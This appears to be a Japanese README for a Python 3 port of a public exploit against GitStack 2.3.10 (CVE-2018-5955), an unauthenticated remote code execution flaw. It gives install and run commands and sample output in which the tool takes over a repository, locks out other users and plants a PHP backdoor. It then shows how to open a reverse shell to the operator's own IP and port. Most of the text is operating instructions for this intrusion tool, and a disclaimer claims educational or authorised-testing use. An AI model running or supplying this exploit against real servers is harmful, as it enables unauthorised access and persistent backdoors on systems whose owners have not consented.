
CVE-2018-5955 GitStack 2.3.10 Unauthenticated RCEのエクスプロイト
CVE-2018-5955 GitStack 2.3.10 認証不要RCEのエクスプロイト
エクスプロイト: GitStack 2.3.10 認証不要リモートコード実行
日付: 2018年1月18日
ソフトウェアリンク: https://gitstack.com/
エクスプロイト作者: Kacper Szurek
元のエクスプロイト: https://www.exploit-db.com/exploits/43777
Webサイト: https://security.szurek.pl/
カテゴリ: remote
CVE: CVE-2018-5955
日付: 2023年6月23日
新機能: 対話型RCE、OS検出、リバースシェル機能、python2 から python3 への移植
CVE: CVE-2018-5955
カテゴリ: remote
私はあなたの行動について一切責任を負いません。これは教育目的、または認定・許可された侵入テストのためにGitHubに公開しています。
必要なパッケージをインストール:
pip install colorama
その後、以下のように実行:
python3 exploit.py
CVEを悪用するとOSが検出され、次のような出力行が表示されます: "[*] OS: $operatingsystem"(以下に実演)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
"os" と入力して、オペレーティングシステムの種類を確認することもできます。
対象マシンで実際のリバースシェルを取得するには、"shell" と入力し、自身のIPとリスニングポートを次のように入力します:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE